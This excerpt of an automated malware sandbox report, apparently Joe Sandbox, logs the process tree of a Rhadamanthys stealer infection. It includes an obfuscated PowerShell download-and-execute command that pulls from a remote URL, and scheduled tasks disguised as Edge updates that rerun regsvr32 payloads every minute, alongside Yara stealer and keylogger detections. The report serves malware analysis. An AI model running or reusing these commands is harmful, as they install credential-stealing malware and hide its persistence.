Commandline:	p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:52:12
Start date:	08/10/2024
Path:	C:\Users\Public\ajbs50ul.bat
Wow64 process (32bit):	false
Commandline:	"C:\Users\Public\ajbs50ul.bat"
Imagebase:	0x7ff63d220000
File size:	2'322'503 bytes
MD5 hash:	8837DF25AABC4FAD85E851ACA192F714
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:52:12
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:52:12
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:52:17
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\utox_x86_x64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\utox_x86_x64.exe"
Imagebase:	0x400000
File size:	4'971'787 bytes
MD5 hash:	E9679980AA73CFC7CF00F3DA7949C661
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	14:52:17
Start date:	08/10/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
Imagebase:	0x7ff648990000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000002.1661729076.000000001BA01000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1602767929.00000000028D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1626522030.000000001C2E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1625000511.000000001C000000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:52:23
Start date:	08/10/2024
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\openwith.exe"
Imagebase:	0x7ff72f4a0000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1770896929.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1776058273.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1774245020.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1772517480.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1751813778.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1764199832.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1758049624.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1767980994.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1739181531.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1745060493.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1765364016.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1774030054.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1730971445.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1759435128.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1749345129.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1744476159.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1743945250.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1748274287.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1627889710.000001F9DF920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1770471428.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1737974066.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1733891571.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1775675719.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1758603457.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1738781521.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1750663652.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1766830436.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1737361189.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1746053538.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1735264963.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1771728010.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1764871739.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1732324317.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1752123123.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1739761324.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1738314505.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1749877777.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.1634556550.000001F9E0470000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1754168196.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1726579095.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1734444495.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1752709890.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1753586274.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1748873710.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1742093895.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1763763009.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1745501240.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1755359019.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1774918323.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1736566513.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1748590947.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1756177662.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1757743595.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1773734067.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1735678354.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1740296656.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1756708487.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1752460608.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1744204587.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1731959678.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1740765343.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1726579095.000001F9E0C91000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1736978478.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1750934596.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1731676215.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1751248603.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1753303535.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1766516787.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1767428012.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1755616290.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1731420429.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1765992633.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1750138359.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1754962335.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1742638722.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1747838363.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1742967878.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1736196050.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1754590766.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1751538386.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1774468300.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1757113350.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1761379644.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1743292419.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:52:24
Start date:	08/10/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
Imagebase:	0x7ff648990000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:52:52
Start date:	08/10/2024
Path:	C:\Windows\System32\rekeywiz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rekeywiz.exe"
Imagebase:	0x7ff7f03b0000
File size:	122'880 bytes
MD5 hash:	A24EFFD38DDC2FFAB4F0592CA2CC585E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:52:52
Start date:	08/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:52:52
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:52:54
Start date:	08/10/2024
Path:	C:\Program Files\Windows Media Player\wmprph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\wmprph.exe"
Imagebase:	0x7ff73d840000
File size:	86'528 bytes
MD5 hash:	B4298167D12E6AC4618518E0B6326802
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	14:52:56
Start date:	08/10/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Imagebase:	0x7ff648990000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	14:52:57
Start date:	08/10/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\dllhost.exe"
Imagebase:	0x7ff673080000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	14:53:02
Start date:	08/10/2024
Path:	C:\Windows\System32\rekeywiz.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\rekeywiz.exe"
Imagebase:	0x7ff7f03b0000
File size:	122'880 bytes
MD5 hash:	A24EFFD38DDC2FFAB4F0592CA2CC585E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:53:15
Start date:	08/10/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Imagebase:	0x7ff648990000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FFB4B434D35 Relevance: 6.7, Strings: 5, Instructions: 441COMMON

Download Yara Rule

Strings

XK, xrefs: 00007FFB4B434E1D
XK, xrefs: 00007FFB4B434EF3
XK, xrefs: 00007FFB4B434F88
XK, xrefs: 00007FFB4B434EBC
XK, xrefs: 00007FFB4B4350A4

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID: XK$ XK$ XK$ XK$ XK
API String ID: 0-1749758050
Opcode ID: bce4ad285f1a79f11f0ddb4565d5eac523083369cbd2ef810b0e9316a02c4a9a
Instruction ID: 4dd0a0094a15489545a6ab47c58244a773322b13aa7711a082ffeb15201346b8
Opcode Fuzzy Hash: bce4ad285f1a79f11f0ddb4565d5eac523083369cbd2ef810b0e9316a02c4a9a
Instruction Fuzzy Hash: 8FD135A2A0EA894FE7A5EFBCC8555B97B90EF45310F0C41FED58DC70E3DA1998058391

Function 00007FFB4B43124D Relevance: 1.1, Instructions: 1058COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1681098246.00007FFB4B430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffb4b430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145394a419f7041a41d094f4c6bff99434e2be109f831b863fe665520685aa35
